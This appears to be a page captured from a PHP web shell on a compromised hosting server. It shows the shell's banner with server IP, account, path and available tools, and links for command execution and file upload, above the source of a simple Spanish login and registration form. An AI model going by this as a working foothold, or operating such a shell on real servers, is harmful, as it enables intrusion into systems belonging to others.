|
Server IP : 167.86.112.62 / Your IP : 216.73.216.27 Web Server : Apache System : Linux vps.hostingboliviaonline.com 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : hesfmvaw ( 1186) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/hesfmvaw/public_html/wpx/../tacfi/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>login</title>
<link rel="stylesheet" href="bootstrap/css/bootstrap.css">
<style>
td label{font-size:14pt;color:#06F;}
</style>
</head>
<body style="background:#FFC">
<center>
<div">
<h2 style="color:#000; ">Inicio de sesión </h2>
<center>
<div>
<table border="0" align="center" valign="middle">
<tr>
<td rowspan=2>
<!-- formulario acceso -->
<form action="validar.php" method="post">
<table border="0">
<tr>
<td><label><b>Usuario:</b></label></td>
<td width=80> <input style="border-radius:15px;" type="text" name="mail" requerid></td>
</tr>
<tr>
<td><label>Contraseña:</b></label></td>
<td witdh=80><input style="border-radius:15px;" type="password" name="pass" requerid></td>
</tr>
<tr>
<td></td>
<td width=80 align=center><input class="btn btn-primary" type="submit" value="Aceptar"></td> </tr>
</table>
</form>
<br>
<!-- formulario registro -->
<form method="post" action="" >
<fieldset>
<legend style="font-size:18pt;color:#040"><b>Registrate Usuario</b></legend>
<div class="form-group">
<label style="font-size:14pt;color:#060"><b>Ingresa tu nombre</b></label>
<input type="text" name="nombre" class="form-control" placeholder="Ingresa tu nombre" requerid>
</div>
<div class="form-group">
<label style="font-size:14pt;color:#060"><b>Ingresa tu Usuario</b></label>
<input type="text" name="nick" class="form-control" placeholder="Ingresa tu Usurio" required/>
</div>
<div class="form-group">
<label style="font-size: 14pt; color:#060"><b>Ingresa tu Password</b></label>
<input type="password" name="pass"class="form-control" placeholder="contraseña"requerid />
</div>
<div class="form-group">
<label style="font-size:14pt;color:#F30"><b>Repite tu contraseña</b></label>
<input type="password" name="rpass" class="form-control" required placeholder="repite"/>
</div>
</fieldset>
</div>
<input class="btn btn-danger" type="submit" name="submit" value="Registrarse"/>
</form>
<?php
if(isset($_POST['submit']))
{
require("registro.php");
}
?>
<!--Fin formulario registro -->
</td>
</tr>
</table>
</div>
</center>
</body>
</html>